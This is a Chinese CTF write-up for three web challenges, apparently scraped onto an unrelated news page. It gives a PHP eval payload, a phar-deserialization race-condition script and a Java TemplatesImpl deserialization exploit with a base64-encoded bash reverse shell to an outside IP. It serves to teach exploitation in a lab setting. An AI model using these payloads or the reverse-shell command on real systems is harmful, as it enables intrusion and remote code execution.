当前位置：首页 > news >正文

企业网站模板源码快速建设企业门户网站

news 2025/11/19 21:44:57

企业网站模板源码,快速建设企业门户网站,百度高级搜索网址,湖北联兴建设有限公司网站目录 warmup-php soeasy_php warmup-java warmup-php spl_autoload_register函数实现了当程序遇到调用没有定义过的函数时#xff0c;会去找./class/函数名.php路径下的php文件#xff0c;并把它包含在程序中。拿到附件拖进Seay里自动审计一下显然利用终点为evaluateExp…目录 warmup-php soeasy_php warmup-java warmup-php spl_autoload_register函数实现了当程序遇到调用没有定义过的函数时会去找./class/函数名.php路径下的php文件并把它包含在程序中。拿到附件拖进Seay里自动审计一下显然利用终点为evaluateExpression() public function evaluateExpression($_expression_,$_data_array()){if(is_string($_expression_)){extract($_data_);return eval(return .$_expression_.;);}else{$_data_[]$this;return call_user_func_array($_expression_, $_data_);}} 全局搜一下触发点 TestView 继承 ListView 继承 Base 以run为入口不难审计得到调用链路 (看不懂的代码可以扔给gpt) TestView#run()-TestView#renderContent()-TestView#renderSection($matches-TestView#renderTableBody()-TestView#renderTableRow($row)-TestView#evaluateExpression(TestView-rowHtmlOptionsExpression) payload: properties[template]{TableBody}properties[data]1properties[rowHtmlOptionsExpression]system(/readflag) soeasy_php 右键查看源码发现两个表单第二个hidden了先随便上传个文件看看改前端把hidden属性删掉把submit注释去掉随便传下参回显成功更换头像再访问/uploads/head.png读到上传文件的内容尝试更换头像为敏感文件实现任意读访问/uploads/head.png成功读到/etc/passwd 尝试去读/proc/1/environ和/flag均响应403显然权限不够于是退一步用同样的方式去读/var/www/html目录下的upload.php和edit.php upload.php ?php if (!isset($_FILES[file])) {die(请上传头像); }$file $_FILES[file]; $filename md5(png.$file[name])..png; $path uploads/.$filename; if(move_uploaded_file($file[tmp_name],$path)){echo 上传成功 .$path; }; edit.php ?php ini_set(error_reporting,0); class flag{public function copyflag(){exec(/copyflag); //以root权限复制/flag 到 /tmp/flag.txt并chown www-data:www-data /tmp/flag.txtecho SFTQL;}public function __destruct(){$this-copyflag();}}function filewrite($file,$data){unlink($file);file_put_contents($file, $data); }if(isset($_POST[png])){$filename $_POST[png];if(!preg_match(/:|phar|\/\/|php/im,$filename)){$f fopen($filename,r);$contents fread($f, filesize($filename));if(strpos($contents,flag{) ! false){filewrite($filename,Dont give me flag!!!);}}if(isset($_POST[flag])) {$flag (string)$_POST[flag];if ($flag Give me flag) {filewrite(/tmp/flag.txt, Dont give me flag);sleep(2);die(no no no !);} else {filewrite(/tmp/flag.txt, $flag); //不给我看我自己写个flag。}$head uploads/head.png;unlink($head);if (symlink($filename, $head)) {echo 成功更换头像;} else {unlink($filename);echo 非正常文件已被删除;};} } “无懈可击的web只有条件竞争能打败” 思路就是利用文件上传上传 phar文件写入超长文件名使得 symlink()函数出错返回 false unlink()触发 phar 反序列化将flag写入到可读的/tmp/flag.txt 处建立与 /tmp/flag.txt 与 uploads/head.png 的软连接在建立与 /tmp/flag.txt 的软链接之前程序会将原来写入的flag给覆盖掉。所以要在覆盖flag后另一个线程已经在copy /flag到 /tmp/flag.txt这样 /uploads/head.png与/tmp/flag.txt建立了链接同时flag也没有被覆盖然后访问 /uploads/head.png读取即可。生成phar文件 ?phpclass flag{public function copyflag(){exec(/copyflag); //以root权限复制/flag 到 /tmp/flag.txt并chown www-data:www-data /tmp/flag.txtecho SFTQL;}public function __destruct(){$this-copyflag();}}$a new flag(); unlink(phar.phar); $phar new Phar(phar.phar); $phar-startBuffering(); $phar-setStub(?php __HALT_COMPILER(); ?); $phar-setMetadata($a); $phar-addFromString(a.txt, a); $phar-stopBuffering(); 先上传恶意phar文件跑条件竞争 import requests import threading import timeurl http://20d746e7-b897-412d-ba98-cd8eb863a196.node5.buuoj.cn:81/ phar rphar://uploads/fe409167fb98b72dcaff5486a612a575.png/a.txtaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa flag r/tmp/flag.txt head uploads/head.png s requests.session() proxies {http: http://127.0.0.1:8080, https: https://127.0.0.1:8080}# 触发phar def uunlink():path edit.phpdata {png: phar,flag: 1}r s.post(url path, data, proxiesproxies)if 400 r.status_code 500:time.sleep(1.5)# 更改head.png为flag def change():path edit.phpdata {png: flag,flag: 1}r s.post(url path, data)if 400 r.status_code 500:time.sleep(1.5)# 读取flag def read_flag():path headr s.get(url path)if 400 r.status_code 500:time.sleep(1.5)else:print(r.text)while True:thread1 threading.Thread(targetuunlink)thread1.start()thread2 threading.Thread(targetchange)thread2.start()thread3 threading.Thread(targetread_flag)thread3.start() warmup-java 没什么可用的依赖反序列化入口自定义handler 项目中并没有引入commons-collections4的jar包也就没有TransformingComparator和InvokerTransformer类。写链参考CC2但compare之后的部分要用动态代理改一下 PriorityQueue#readObject() - PriorityQueue#heapify() - PriorityQueue#siftDown()- PriorityQueue#siftDownUsingComparator() - proxy.compare(TemplatesImpl) - MyInvocationHandler#invoke() - TemplatesImpl#getOutputProperties - TemplatesImpl#newTransformer - TemplatesImpl#getTransletInstance - TemplatesImpl#defineTransletClasses - loader.defineClass(_bytecodes[i])exp: package com.example.warmup.exp;import com.example.warmup.MyInvocationHandler; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.ClassClassPath; import javassist.ClassPool; import javassist.CtClass;import javax.xml.transform.Templates; import java.io.*; import java.lang.reflect.Field; import java.lang.reflect.Proxy; import java.util.Comparator; import java.util.PriorityQueue;public class EXP {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static TemplatesImpl generateEvilTemplates() throws Exception {ClassPool pool ClassPool.getDefault();pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));CtClass cc pool.makeClass(Cat);String cmd java.lang.Runtime.getRuntime().exec(\bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDAJjE}|{base64,-d}|{bash,-i}\);;// 创建 static 代码块并插入代码cc.makeClassInitializer().insertBefore(cmd);String randomClassName EvilCat System.nanoTime();cc.setName(randomClassName);cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));// 转换为bytesbyte[] classBytes cc.toBytecode();byte[][] targetByteCodes new byte[][]{classBytes};TemplatesImpl templates TemplatesImpl.class.newInstance();setFieldValue(templates, _bytecodes, targetByteCodes);// 进入 defineTransletClasses() 方法需要的条件setFieldValue(templates, _name, name System.nanoTime());setFieldValue(templates, _class, null);setFieldValue(templates, _tfactory, new TransformerFactoryImpl());return templates;}//序列化public static void serialize(Object obj) throws IOException {ObjectOutputStream oosnew ObjectOutputStream(new FileOutputStream(ser.bin));oos.writeObject(obj);}//反序列化public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{ObjectInputStream oisnew ObjectInputStream(new FileInputStream(Filename));Object objectois.readObject();return object;}public static String bytesTohexString(String s) throws IOException {File file new File(s);FileInputStream fis new FileInputStream(file);byte[] bytes new byte[(int) file.length()];fis.read(bytes);if (bytes null) {return null;} else {StringBuilder ret new StringBuilder(2 * bytes.length);for(int i 0; i bytes.length; i) {int b 15 bytes[i] 4;ret.append(0123456789abcdef.charAt(b));b 15 bytes[i];ret.append(0123456789abcdef.charAt(b));}return ret.toString();}}public static void main(String[] args) throws Exception {TemplatesImpl templates generateEvilTemplates();MyInvocationHandler myInvocationHandler new MyInvocationHandler();Class c myInvocationHandler.getClass();Field type c.getDeclaredField(type);type.setAccessible(true);type.set(myInvocationHandler,Templates.class);//代理接口为Comparator,便于后续调用compare方法Comparator proxy (Comparator) Proxy.newProxyInstance(MyInvocationHandler.class.getClassLoader(), new Class[]{Comparator.class}, myInvocationHandler);//初始化属性comparator为proxy类PriorityQueue priorityQueue new PriorityQueue(2);priorityQueue.add(1);priorityQueue.add(2);Object[] queue {templates,templates};setFieldValue(priorityQueue,comparator,proxy);setFieldValue(priorityQueue,queue,queue);serialize(priorityQueue);System.out.println(bytesTohexString(ser.bin));} } 打入payload 监听反弹shell拿flag

查看全文

http://www.pierceye.com/news/621129/